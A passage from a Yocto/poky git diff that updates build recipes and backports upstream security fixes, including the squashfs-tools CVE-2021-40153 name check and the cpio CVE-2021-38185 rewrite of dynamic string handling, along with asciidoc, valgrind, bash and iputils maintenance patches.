if(check_name(dire->name, dire->size + 1) == FALSE) { ++ ERROR("File system corrupted: invalid characters in name\n"); ++ goto corrupted; ++ } ++ + TRACE("squashfs_opendir: directory entry %s, inode " + "%d:%d, type %d\n", dire->name, + dirh.start_block, dire->offset, dire->type); +diff --git a/squashfs-tools/unsquashfs.h b/squashfs-tools/unsquashfs.h +index 934618b2..db1da7a0 100644 +--- a/squashfs-tools/unsquashfs.h ++++ b/squashfs-tools/unsquashfs.h +@@ -4,7 +4,7 @@ + * Unsquash a squashfs filesystem. This is a highly compressed read only + * filesystem. + * +- * Copyright (c) 2009, 2010, 2013, 2014, 2019 ++ * Copyright (c) 2009, 2010, 2013, 2014, 2019, 2021 + * Phillip Lougher <phillip@squashfs.org.uk> + * + * This program is free software; you can redistribute it and/or +@@ -261,4 +261,7 @@ extern int read_ids(int, long long, long long, unsigned int **); + + /* unsquash-34.c */ + extern long long *alloc_index_table(int); ++ ++/* unsquash-1234.c */ ++extern int check_name(char *, int); + #endif diff --git a/poky/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb b/poky/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb index 2b1409d78d..5d754b20b3 100644 --- a/poky/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb +++ b/poky/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb @@ -9,8 +9,9 @@ LIC_FILES_CHKSUM = "file://../COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" PV = "4.4" SRCREV = "52eb4c279cd283ed9802dd1ceb686560b22ffb67" -SRC_URI = "git://github.com/plougher/squashfs-tools.git;protocol=https \ +SRC_URI = "git://github.com/plougher/squashfs-tools.git;protocol=https;branch=master \ file://0001-squashfs-tools-fix-build-failure-against-gcc-10.patch;striplevel=2 \ + file://CVE-2021-40153.patch;striplevel=2 \ " S = "${WORKDIR}/git/squashfs-tools" diff --git a/poky/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb b/poky/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb index aafe7c72a0..e1233ffde0 100644 --- a/poky/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb +++ b/poky/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb @@ -8,7 +8,7 @@ LICENSE = "LGPLv2.1 & GPLv2" LIC_FILES_CHKSUM = "file://LICENSE.LGPL2.1;md5=4fbd65380cdd255951079008b364516c \ file://LICENSE.GPL2;md5=751419260aa954499f7abaabaa882bbe" -SRC_URI = "git://github.com/systemd/systemd-bootchart.git;protocol=https \ +SRC_URI = "git://github.com/systemd/systemd-bootchart.git;protocol=https;branch=master \ file://0001-architecture-Recognise-RISCV-32-RISCV-64.patch \ file://mips64.patch \ " diff --git a/poky/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb b/poky/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb index 44a0d227ec..b671956cc8 100644 --- a/poky/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb +++ b/poky/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb @@ -10,7 +10,7 @@ SRCREV = "a022ef2f1acfd9209a1bf792dda14ae4b0d1b60f" PV = "1.7.0+git${SRCPV}" UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))" -SRC_URI = "git://git.eclipse.org/gitroot/tcf/org.eclipse.tcf.agent \ +SRC_URI = "git://git.eclipse.org/r/tcf/org.eclipse.tcf.agent.git;protocol=https;branch=master \ file://fix_ranlib.patch \ file://ldflags.patch \ file://tcf-agent.init \ diff --git a/poky/meta/recipes-devtools/unfs3/unfs3_git.bb b/poky/meta/recipes-devtools/unfs3/unfs3_git.bb index b1882defa2..d1b3fb8f57 100644 --- a/poky/meta/recipes-devtools/unfs3/unfs3_git.bb +++ b/poky/meta/recipes-devtools/unfs3/unfs3_git.bb @@ -14,7 +14,7 @@ DEPENDS_append_class-nativesdk = " flex-nativesdk" ASNEEDED = "" S = "${WORKDIR}/git" -SRC_URI = "git://github.com/unfs3/unfs3.git;protocol=https \ +SRC_URI = "git://github.com/unfs3/unfs3.git;protocol=https;branch=master \ file://unfs3_parallel_build.patch \ file://alternate_rpc_ports.patch \ file://fix_pid_race_parent_writes_child_pid.patch \ diff --git a/poky/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64 b/poky/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64 index 93bfd45a4e..afa6a94825 100644 --- a/poky/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64 +++ b/poky/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64 @@ -120,6 +120,7 @@ drd/tests/tc19_shadowmem drd/tests/tc21_pthonce drd/tests/tc22_exit_w_lock drd/tests/tc23_bogus_condwait +gdbserver_tests/hginfo helgrind/tests/annotate_rwlock helgrind/tests/annotate_smart_pointer helgrind/tests/bar_bad diff --git a/poky/meta/recipes-devtools/valgrind/valgrind/remove-for-all b/poky/meta/recipes-devtools/valgrind/valgrind/remove-for-all index d6a85c4735..9b8db093df 100644 --- a/poky/meta/recipes-devtools/valgrind/valgrind/remove-for-all +++ b/poky/meta/recipes-devtools/valgrind/valgrind/remove-for-all @@ -1,2 +1,3 @@ drd/tests/bar_bad drd/tests/bar_bad_xml +gdbserver_tests/hginfo diff --git a/poky/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch b/poky/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch new file mode 100644 index 0000000000..14c1cd806e --- /dev/null +++ b/poky/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch @@ -0,0 +1,42 @@ +From 44d2d6095246124c024230f89c1029794491839f Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Miro=20Hron=C4=8Dok?= <miro@hroncok.cz> +Date: Fri, 30 Oct 2020 15:10:35 +0100 +Subject: [PATCH] Properly detect and compare Python version 3.10+ (#151) + +Upstream commit: https://github.com/asciidoc-py/asciidoc-py/commit/44d2d6095246124c024230f89c1029794491839f + +Slightly modified to cleanly apply to asciidoc 8.6.9: +- VERSION and MIN_PYTHON_VERSION changed to reflect values in 8.6.9 +- line numbers corrected to eliminate offset warnings + +Upstream-Status: Backport +Signed-off-by: Steve Sakoman <steve@sakoman.com> + +--- + asciidoc.py | 6 +++--- + 1 file changed, 3 insertions(+), 3 deletions(-) + +diff --git a/asciidoc.py b/asciidoc.py +index f960e7d8..42868c4b 100755 +--- a/asciidoc.py ++++ b/asciidoc.py +@@ -30,7 +30,7 @@ + # Used by asciidocapi.py # + VERSION = '8.6.10' # See CHANGELOG file for version history. + +-MIN_PYTHON_VERSION = '3.4' # Require this version of Python or better. ++MIN_PYTHON_VERSION = (3, 4) # Require this version of Python or better. + + # --------------------------------------------------------------------------- + # Program constants. +@@ -4704,8 +4704,8 @@ def init(self, cmd): + directory. + cmd is the asciidoc command or asciidoc.py path. + """ +- if float(sys.version[:3]) < float(MIN_PYTHON_VERSION): +- message.stderr('FAILED: Python %s or better required' % MIN_PYTHON_VERSION) ++ if sys.version_info[:2] < MIN_PYTHON_VERSION: ++ message.stderr('FAILED: Python %d.%d or better required' % MIN_PYTHON_VERSION) + sys.exit(1) + if not os.path.exists(cmd): + message.stderr('FAILED: Missing asciidoc command: %s' % cmd) diff --git a/poky/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb b/poky/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb index 932339f739..62738dc8d9 100644 --- a/poky/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb +++ b/poky/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb @@ -9,7 +9,8 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=8ca43cbc842c2336e835926c2166c28b \ file://COPYRIGHT;md5=029ad5428ba5efa20176b396222d4069" SRC_URI = "git://github.com/asciidoc/asciidoc-py3;protocol=https;branch=main \ - file://auto-catalogs.patch" + file://auto-catalogs.patch \ + file://detect-python-version.patch" SRCREV = "618f6e6f6b558ed1e5f2588cd60a5a6b4f881ca0" PV .= "+py3-git${SRCPV}" diff --git a/poky/meta/recipes-extended/bash/bash.inc b/poky/meta/recipes-extended/bash/bash.inc index c7cf8cddd3..4e6176d2e6 100644 --- a/poky/meta/recipes-extended/bash/bash.inc +++ b/poky/meta/recipes-extended/bash/bash.inc @@ -49,6 +49,11 @@ do_compile_ptest () { oe_runmake buildtest } +do_install_prepend () { + # Ensure determinism as this counter increases for each make call + rm -f ${B}/.build +} + do_install_append () { # Move /usr/bin/bash to /bin/bash, if need if [ "${base_bindir}" != "${bindir}" ]; then diff --git a/poky/meta/recipes-extended/bzip2/bzip2/Makefile.am b/poky/meta/recipes-extended/bzip2/bzip2/Makefile.am index dcf64584d9..adc85a62b2 100644 --- a/poky/meta/recipes-extended/bzip2/bzip2/Makefile.am +++ b/poky/meta/recipes-extended/bzip2/bzip2/Makefile.am @@ -1,6 +1,6 @@ lib_LTLIBRARIES = libbz2.la -libbz2_la_LDFLAGS = -version-info 1:6:0 +libbz2_la_LDFLAGS = -version-info 1:8:0 libbz2_la_SOURCES = blocksort.c \ huffman.c \ diff --git a/poky/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch b/poky/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch new file mode 100644 index 0000000000..6ceafeee49 --- /dev/null +++ b/poky/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch @@ -0,0 +1,581 @@ +GNU cpio through 2.13 allows attackers to execute arbitrary code via a crafted +pattern file, because of a dstring.c ds_fgetstr integer overflow that triggers +an out-of-bounds heap write. + +CVE: CVE-2021-38185 +Upstream-Status: Backport +Signed-off-by: Ross Burton <ross.burton@arm.com> + +From e494c68a3a0951b1eaba77e2db93f71a890e15d8 Mon Sep 17 00:00:00 2001 +From: Sergey Poznyakoff <gray@gnu.org> +Date: Sat, 7 Aug 2021 12:52:21 +0300 +Subject: [PATCH 1/3] Rewrite dynamic string support. + +* src/dstring.c (ds_init): Take a single argument. +(ds_free): New function. +(ds_resize): Take a single argument. Use x2nrealloc to expand +the storage. +(ds_reset,ds_append,ds_concat,ds_endswith): New function. +(ds_fgetstr): Rewrite. In particular, this fixes integer overflow. +* src/dstring.h (dynamic_string): Keep both the allocated length +(ds_size) and index of the next free byte in the string (ds_idx). +(ds_init,ds_resize): Change signature. +(ds_len): New macro. +(ds_free,ds_reset,ds_append,ds_concat,ds_endswith): New protos. +* src/copyin.c: Use new ds_ functions. +* src/copyout.c: Likewise. +* src/copypass.c: Likewise. +* src/util.c: Likewise. +--- + src/copyin.c | 40 +++++++++++------------ + src/copyout.c | 16 ++++----- + src/copypass.c | 34 +++++++++---------- + src/dstring.c | 88 ++++++++++++++++++++++++++++++++++++-------------- + src/dstring.h | 31 +++++++++--------- + src/util.c | 6 ++-- + 6 files changed, 123 insertions(+), 92 deletions(-) + +diff --git a/src/copyin.c b/src/copyin.c +index b29f348..37e503a 100644 +--- a/src/copyin.c ++++ b/src/copyin.c +@@ -55,11 +55,12 @@ query_rename(struct cpio_file_stat* file_hdr, FILE *tty_in, FILE *tty_out, + char *str_res; /* Result for string function. */ + static dynamic_string new_name; /* New file name for rename option. */ + static int initialized_new_name = false; ++ + if (!initialized_new_name) +- { +- ds_init (&new_name, 128); +- initialized_new_name = true; +- } ++ { ++ ds_init (&new_name); ++ initialized_new_name = true; ++ } + + if (rename_flag) + { +@@ -779,37 +780,36 @@ long_format (struct cpio_file_stat *file_hdr, char const *link_name) + already in `save_patterns' (from the command line) are preserved. */ + + static void +-read_pattern_file () ++read_pattern_file (void) + { +- int max_new_patterns; +- char **new_save_patterns; +- int new_num_patterns; ++ char **new_save_patterns = NULL; ++ size_t max_new_patterns; ++ size_t new_num_patterns; + int i; +- dynamic_string pattern_name; ++ dynamic_string pattern_name = DYNAMIC_STRING_INITIALIZER; + FILE *pattern_fp; + + if (num_patterns < 0) + num_patterns = 0; +- max_new_patterns = 1 + num_patterns; +- new_save_patterns = (char **) xmalloc (max_new_patterns * sizeof (char *)); + new_num_patterns = num_patterns; +- ds_init (&pattern_name, 128); ++ max_new_patterns = num_patterns; ++ new_save_patterns = xcalloc (max_new_patterns, sizeof (new_save_patterns[0])); + + pattern_fp = fopen (pattern_file_name, "r"); + if (pattern_fp == NULL) + open_fatal (pattern_file_name); + while (ds_fgetstr (pattern_fp, &pattern_name, '\n') != NULL) + { +- if (new_num_patterns >= max_new_patterns) +- { +- max_new_patterns += 1; +- new_save_patterns = (char **) +- xrealloc ((char *) new_save_patterns, +- max_new_patterns * sizeof (char *)); +- } ++ if (new_num_patterns == max_new_patterns) ++ new_save_patterns = x2nrealloc (new_save_patterns, ++ &max_new_patterns, ++ sizeof (new_save_patterns[0])); + new_save_patterns[new_num_patterns] = xstrdup (pattern_name.ds_string); + ++new_num_patterns; + } ++ ++ ds_free (&pattern_name); ++ + if (ferror (pattern_fp) || fclose (pattern_fp) == EOF) + close_error (pattern_file_name); + +@@ -1196,7 +1196,7 @@ swab_array (char *ptr, int count) + in the file system. */ + + void +-process_copy_in () ++process_copy_in (void) + { + char done = false; /* True if trailer reached. */ + FILE *tty_in = NULL; /* Interactive file for rename option. */ +diff --git a/src/copyout.c b/src/copyout.c +index 8b0beb6..26e3dda 100644 +--- a/src/copyout.c ++++ b/src/copyout.c +@@ -594,9 +594,10 @@ assign_string (char **pvar, char *value) + The format of the header depends on the compatibility (-c) flag. */ + + void +-process_copy_out () ++process_copy_out (void) + { +- dynamic_string input_name; /* Name of file read from stdin. */ ++ dynamic_string input_name = DYNAMIC_STRING_INITIALIZER; ++ /* Name of file read from stdin. */ + struct stat file_stat; /* Stat record for file. */ + struct cpio_file_stat file_hdr = CPIO_FILE_STAT_INITIALIZER; + /* Output header information. */ +@@ -605,7 +606,6 @@ process_copy_out () + char *orig_file_name = NULL; + + /* Initialize the copy out. */ +- ds_init (&input_name, 128); + file_hdr.c_magic = 070707; + + /* Check whether the output file might be a tape. */ +@@ -657,14 +657,9 @@ process_copy_out () + { + if (file_hdr.c_mode & CP_IFDIR) + { +- int len = strlen (input_name.ds_string); + /* Make sure the name ends with a slash */ +- if (input_name.ds_string[len-1] != '/') +- { +- ds_resize (&input_name, len + 2); +- input_name.ds_string[len] = '/'; +- input_name.ds_string[len+1] = 0; +- } ++ if (!ds_endswith (&input_name, '/')) ++ ds_append (&input_name, '/'); + } + } + +@@ -875,6 +870,7 @@ process_copy_out () + (unsigned long) blocks), (unsigned long) blocks); + } + cpio_file_stat_free (&file_hdr); ++ ds_free (&input_name); + } + + +diff --git a/src/copypass.c b/src/copypass.c +index dc13b5b..62f31c6 100644 +--- a/src/copypass.c ++++ b/src/copypass.c +@@ -48,10 +48,12 @@ set_copypass_perms (int fd, const char *name, struct stat *st) + If `link_flag', link instead of copying. */ + + void +-process_copy_pass () ++process_copy_pass (void) + { +- dynamic_string input_name; /* Name of file from stdin. */ +- dynamic_string output_name; /* Name of new file. */ ++ dynamic_string input_name = DYNAMIC_STRING_INITIALIZER; ++ /* Name of file from stdin. */ ++ dynamic_string output_name = DYNAMIC_STRING_INITIALIZER; ++ /* Name of new file. */ + size_t dirname_len; /* Length of `directory_name'. */ + int res; /* Result of functions. */ + char *slash; /* For moving past slashes in input name. */ +@@ -65,25 +67,18 @@ process_copy_pass () + created files */ + + /* Initialize the copy pass. */ +- ds_init (&input_name, 128); + + dirname_len = strlen (directory_name); + if (change_directory_option && !ISSLASH (directory_name[0])) + { + char *pwd = xgetcwd (); +- +- dirname_len += strlen (pwd) + 1; +- ds_init (&output_name, dirname_len + 2); +- strcpy (output_name.ds_string, pwd); +- strcat (output_name.ds_string, "/"); +- strcat (output_name.ds_string, directory_name); ++ ++ ds_concat (&output_name, pwd); ++ ds_append (&output_name, '/'); + } +- else +- { +- ds_init (&output_name, dirname_len + 2); +- strcpy (output_name.ds_string, directory_name); +- } +- output_name.ds_string[dirname_len] = '/'; ++ ds_concat (&output_name, directory_name); ++ ds_append (&output_name, '/'); ++ dirname_len = ds_len (&output_name); + output_is_seekable = true; + + change_dir (); +@@ -116,8 +111,8 @@ process_copy_pass () + /* Make the name of the new file. */ + for (slash = input_name.ds_string; *slash == '/'; ++slash) + ; +- ds_resize (&output_name, dirname_len + strlen (slash) + 2); +- strcpy (output_name.ds_string + dirname_len + 1, slash); ++ ds_reset (&output_name, dirname_len); ++ ds_concat (&output_name, slash); + + existing_dir = false; + if (lstat (output_name.ds_string, &out_file_stat) == 0) +@@ -333,6 +328,9 @@ process_copy_pass () + (unsigned long) blocks), + (unsigned long) blocks); + } ++ ++ ds_free (&input_name); ++ ds_free (&output_name); + } + + /* Try and create a hard link from FILE_NAME to another file +diff --git a/src/dstring.c b/src/dstring.c +index e9c063f..358f356 100644 +--- a/src/dstring.c ++++ b/src/dstring.c +@@ -20,8 +20,8 @@ + #if defined(HAVE_CONFIG_H) + # include <config.h> + #endif +- + #include <stdio.h> ++#include <stdlib.h> + #if defined(HAVE_STRING_H) || defined(STDC_HEADERS) + #include <string.h> + #else +@@ -33,24 +33,41 @@ + /* Initialiaze dynamic string STRING with space for SIZE characters. */ + + void +-ds_init (dynamic_string *string, int size) ++ds_init (dynamic_string *string) ++{ ++ memset (string, 0, sizeof *string); ++} ++ ++/* Free the dynamic string storage. */ ++ ++void ++ds_free (dynamic_string *string) + { +- string->ds_length = size; +- string->ds_string = (char *) xmalloc (size); ++ free (string->ds_string); + } + +-/* Expand dynamic string STRING, if necessary, to hold SIZE characters. */ ++/* Expand dynamic string STRING, if necessary. */ + + void +-ds_resize (dynamic_string *string, int size) ++ds_resize (dynamic_string *string) + { +- if (size > string->ds_length) ++ if (string->ds_idx == string->ds_size) + { +- string->ds_length = size; +- string->ds_string = (char *) xrealloc ((char *) string->ds_string, size); ++ string->ds_string = x2nrealloc (string->ds_string, &string->ds_size, ++ 1); + } + } + ++/* Reset the index of the dynamic string S to LEN. */ ++ ++void ++ds_reset (dynamic_string *s, size_t len) ++{ ++ while (len > s->ds_size) ++ ds_resize (s); ++ s->ds_idx = len; ++} ++ + /* Dynamic string S gets a string terminated by the EOS character + (which is removed) from file F. S will increase + in size during the function if the string from F is longer than +@@ -61,34 +78,50 @@ ds_resize (dynamic_string *string, int size) + char * + ds_fgetstr (FILE *f, dynamic_string *s, char eos) + { +- int insize; /* Amount needed for line. */ +- int strsize; /* Amount allocated for S. */ + int next_ch; + + /* Initialize. */ +- insize = 0; +- strsize = s->ds_length; ++ s->ds_idx = 0; + + /* Read the input string. */ +- next_ch = getc (f); +- while (next_ch != eos && next_ch != EOF) ++ while ((next_ch = getc (f)) != eos && next_ch != EOF) + { +- if (insize >= strsize - 1) +- { +- ds_resize (s, strsize * 2 + 2); +- strsize = s->ds_length; +- } +- s->ds_string[insize++] = next_ch; +- next_ch = getc (f); ++ ds_resize (s); ++ s->ds_string[s->ds_idx++] = next_ch; + } +- s->ds_string[insize++] = '\0'; ++ ds_resize (s); ++ s->ds_string[s->ds_idx] = '\0'; + +- if (insize == 1 && next_ch == EOF) ++ if (s->ds_idx == 0 && next_ch == EOF) + return NULL; + else + return s->ds_string; + } + ++void ++ds_append (dynamic_string *s, int c) ++{ ++ ds_resize (s); ++ s->ds_string[s->ds_idx] = c; ++ if (c) ++ { ++ s->ds_idx++; ++ ds_resize (s); ++ s->ds_string[s->ds_idx] = 0; ++ } ++} ++ ++void ++ds_concat (dynamic_string *s, char const *str) ++{ ++ size_t len = strlen (str); ++ while (len + 1 > s->ds_size) ++ ds_resize (s); ++ memcpy (s->ds_string + s->ds_idx, str, len); ++ s->ds_idx += len; ++ s->ds_string[s->ds_idx] = 0; ++} ++ + char * + ds_fgets (FILE *f, dynamic_string *s) + { +@@ -100,3 +133,10 @@ ds_fgetname (FILE *f, dynamic_string *s) + { + return ds_fgetstr (f, s, '\0'); + } ++ ++/* Return true if the dynamic string S ends with character C. */ ++int ++ds_endswith (dynamic_string *s, int c) ++{ ++ return (s->ds_idx > 0 && s->ds_string[s->ds_idx - 1] == c); ++} +diff --git a/src/dstring.h b/src/dstring.h +index b5135fe..f5b04ef 100644 +--- a/src/dstring.h ++++ b/src/dstring.h +@@ -17,10 +17,6 @@ + Software Foundation, Inc., 51 Franklin Street, Fifth Floor, + Boston, MA 02110-1301 USA. */ + +-#ifndef NULL +-#define NULL 0 +-#endif +- + /* A dynamic string consists of record that records the size of an + allocated string and the pointer to that string. The actual string + is a normal zero byte terminated string that can be used with the +@@ -30,22 +26,25 @@ + + typedef struct + { +- int ds_length; /* Actual amount of storage allocated. */ +- char *ds_string; /* String. */ ++ size_t ds_size; /* Actual amount of storage allocated. */ ++ size_t ds_idx; /* Index of the next free byte in the string. */ ++ char *ds_string; /* String storage. */ + } dynamic_string; + ++#define DYNAMIC_STRING_INITIALIZER { 0, 0, NULL } + +-/* Macros that look similar to the original string functions. +- WARNING: These macros work only on pointers to dynamic string records. +- If used with a real record, an "&" must be used to get the pointer. */ +-#define ds_strlen(s) strlen ((s)->ds_string) +-#define ds_strcmp(s1, s2) strcmp ((s1)->ds_string, (s2)->ds_string) +-#define ds_strncmp(s1, s2, n) strncmp ((s1)->ds_string, (s2)->ds_string, n) +-#define ds_index(s, c) index ((s)->ds_string, c) +-#define ds_rindex(s, c) rindex ((s)->ds_string, c) ++void ds_init (dynamic_string *string); ++void ds_free (dynamic_string *string); ++void ds_reset (dynamic_string *s, size_t len); + +-void ds_init (dynamic_string *string, int size); +-void ds_resize (dynamic_string *string, int size); ++/* All functions below guarantee that s->ds_string[s->ds_idx] == '\0' */ + char *ds_fgetname (FILE *f, dynamic_string *s); + char *ds_fgets (FILE *f, dynamic_string *s); + char *ds_fgetstr (FILE *f, dynamic_string *s, char eos); ++void ds_append (dynamic_string *s, int c); ++void ds_concat (dynamic_string *s, char const *str); ++ ++#define ds_len(s) ((s)->ds_idx) ++ ++int ds_endswith (dynamic_string *s, int c); ++ +diff --git a/src/util.c b/src/util.c +index 4421b20..6d6bbaa 100644 +--- a/src/util.c ++++ b/src/util.c +@@ -846,11 +846,9 @@ get_next_reel (int tape_des) + FILE *tty_out; /* File for interacting with user. */ + int old_tape_des; + char *next_archive_name; +- dynamic_string new_name; ++ dynamic_string new_name = DYNAMIC_STRING_INITIALIZER; + char *str_res; + +- ds_init (&new_name, 128); +- + /* Open files for interactive communication. */ + tty_in = fopen (TTY_NAME, "r"); + if (tty_in == NULL) +@@ -925,7 +923,7 @@ get_next_reel (int tape_des) + error (PAXEXIT_FAILURE, 0, _("internal error: tape descriptor changed from %d to %d"), + old_tape_des, tape_des); + +- free (new_name.ds_string); ++ ds_free (&new_name); + fclose (tty_in); + fclose (tty_out); + } +-- +2.25.1 + + +From fb7a51bf85b8e6f045cacb4fb783db4a414741bf Mon Sep 17 00:00:00 2001 +From: Sergey Poznyakoff <gray@gnu.org> +Date: Wed, 11 Aug 2021 18:10:38 +0300 +Subject: [PATCH 2/3] Fix previous commit + +* src/dstring.c (ds_reset,ds_concat): Don't call ds_resize in a +loop. +--- + src/dstring.c | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +diff --git a/src/dstring.c b/src/dstring.c +index 358f356..90c691c 100644 +--- a/src/dstring.c ++++ b/src/dstring.c +@@ -64,7 +64,7 @@ void + ds_reset (dynamic_string *s, size_t len) + { + while (len > s->ds_size) +- ds_resize (s); ++ s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); + s->ds_idx = len; + } + +@@ -116,7 +116,7 @@ ds_concat (dynamic_string *s, char const *str) + { + size_t len = strlen (str); + while (len + 1 > s->ds_size) +- ds_resize (s); ++ s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); + memcpy (s->ds_string + s->ds_idx, str, len); + s->ds_idx += len; + s->ds_string[s->ds_idx] = 0; +-- +2.25.1 + + +From 86b37d74b15f9bb5fe62fd1642cc126d3ace0189 Mon Sep 17 00:00:00 2001 +From: Sergey Poznyakoff <gray@gnu.org> +Date: Wed, 18 Aug 2021 09:41:39 +0300 +Subject: [PATCH 3/3] Fix dynamic string reallocations + +* src/dstring.c (ds_resize): Take additional argument: number of +bytes to leave available after ds_idx. All uses changed. +--- + src/dstring.c | 18 ++++++++---------- + 1 file changed, 8 insertions(+), 10 deletions(-) + +diff --git a/src/dstring.c b/src/dstring.c +index 90c691c..0f597cc 100644 +--- a/src/dstring.c ++++ b/src/dstring.c +@@ -49,9 +49,9 @@ ds_free (dynamic_string *string) + /* Expand dynamic string STRING, if necessary. */ + + void +-ds_resize (dynamic_string *string) ++ds_resize (dynamic_string *string, size_t len) + { +- if (string->ds_idx == string->ds_size) ++ while (len + string->ds_idx >= string->ds_size) + { + string->ds_string = x2nrealloc (string->ds_string, &string->ds_size, + 1); +@@ -63,8 +63,7 @@ ds_resize (dynamic_string *string) + void + ds_reset (dynamic_string *s, size_t len) + { +- while (len > s->ds_size) +- s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); ++ ds_resize (s, len); + s->ds_idx = len; + } + +@@ -86,10 +85,10 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos) + /* Read the input string. */ + while ((next_ch = getc (f)) != eos && next_ch != EOF) + { +- ds_resize (s); ++ ds_resize (s, 0); + s->ds_string[s->ds_idx++] = next_ch; + } +- ds_resize (s); ++ ds_resize (s, 0); + s->ds_string[s->ds_idx] = '\0'; + + if (s->ds_idx == 0 && next_ch == EOF) +@@ -101,12 +100,12 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos) + void + ds_append (dynamic_string *s, int c) + { +- ds_resize (s); ++ ds_resize (s, 0); + s->ds_string[s->ds_idx] = c; + if (c) + { + s->ds_idx++; +- ds_resize (s); ++ ds_resize (s, 0); + s->ds_string[s->ds_idx] = 0; + } + } +@@ -115,8 +114,7 @@ void + ds_concat (dynamic_string *s, char const *str) + { + size_t len = strlen (str); +- while (len + 1 > s->ds_size) +- s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); ++ ds_resize (s, len); + memcpy (s->ds_string + s->ds_idx, str, len); + s->ds_idx += len; + s->ds_string[s->ds_idx] = 0; +-- +2.25.1 + diff --git a/poky/meta/recipes-extended/cpio/cpio_2.13.bb b/poky/meta/recipes-extended/cpio/cpio_2.13.bb index 6536257993..7c8a465cd0 100644 --- a/poky/meta/recipes-extended/cpio/cpio_2.13.bb +++ b/poky/meta/recipes-extended/cpio/cpio_2.13.bb @@ -9,6 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f27defe1e96c2e1ecd4e0c9be8967949" SRC_URI = "${GNU_MIRROR}/cpio/cpio-${PV}.tar.gz \ file://0001-Unset-need_charset_alias-when-building-for-musl.patch \ file://0002-src-global.c-Remove-superfluous-declaration-of-progr.patch \ + file://CVE-2021-38185.patch \ " SRC_URI[md5sum] = "389c5452d667c23b5eceb206f5000810" diff --git a/poky/meta/recipes-extended/cups/cups.inc b/poky/meta/recipes-extended/cups/cups.inc index 151ef065fe..15f46937e1 100644 --- a/poky/meta/recipes-extended/cups/cups.inc +++ b/poky/meta/recipes-extended/cups/cups.inc @@ -41,7 +41,7 @@ PACKAGECONFIG ??= "${@bb.utils.contains('DISTRO_FEATURES', 'zeroconf', 'avahi', PACKAGECONFIG[avahi] = "--enable-avahi,--disable-avahi,avahi" PACKAGECONFIG[acl] = "--enable-acl,--disable-acl,acl" PACKAGECONFIG[pam] = "--enable-pam --with-pam-module=unix, --disable-pam, libpam" -PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--without-systemd,systemd" +PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--disable-systemd,systemd" PACKAGECONFIG[xinetd] = "--with-xinetd=${sysconfdir}/xinetd.d,--without-xinetd,xinetd" EXTRA_OECONF = " \ diff --git a/poky/meta/recipes-extended/go-examples/go-helloworld_0.1.bb b/poky/meta/recipes-extended/go-examples/go-helloworld_0.1.bb index ab70ea98a3..7d0f74186e 100644 --- a/poky/meta/recipes-extended/go-examples/go-helloworld_0.1.bb +++ b/poky/meta/recipes-extended/go-examples/go-helloworld_0.1.bb @@ -5,7 +5,7 @@ HOMEPAGE = "https://golang.org/" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://${COMMON_LICENSE_DIR}/MIT;md5=0835ade698e0bcf8506ecda2f7b4f302" -SRC_URI = "git://${GO_IMPORT}" +SRC_URI = "git://${GO_IMPORT};branch=master" SRCREV = "46695d81d1fae905a270fb7db8a4d11a334562fe" UPSTREAM_CHECK_COMMITS = "1" diff --git a/poky/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch b/poky/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch new file mode 100644 index 0000000000..bf86115843 --- /dev/null +++ b/poky/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch @@ -0,0 +1,79 @@ +From 86ed08936d49e2c81ef49dfbd02aca1c74d0c098 Mon Sep 17 00:00:00 2001 +From: lac-0073 <61903197+lac-0073@users.noreply.github.com> +Date: Mon, 26 Oct 2020 09:45:42 +0800 +Subject: [PATCH] arpping: make update neighbours work again + +The arping is using inconsistent sender_ip_addr and target_ip_addr in +messages. This causes the client receiving the arp message not to update +the arp table entries. + +The specific performance is as follows: + +There is a machine 2 with IP 10.20.30.3 configured on eth0:0 that is in the +same IP subnet as eth0. This IP was originally used on another machine 1, +and th IP needs to be changed back to the machine 1. When using the arping +command to announce what ethernet address has IP 10.20.30.3, the arp table +on machine 3 is not updated. + +Machine 3 original arp table: + + 10.20.30.3 machine 2 eth0:0 00:00:00:00:00:02 + 10.20.30.2 machine 2 eth0 00:00:00:00:00:02 + 10.20.30.1 machine 1 eth0 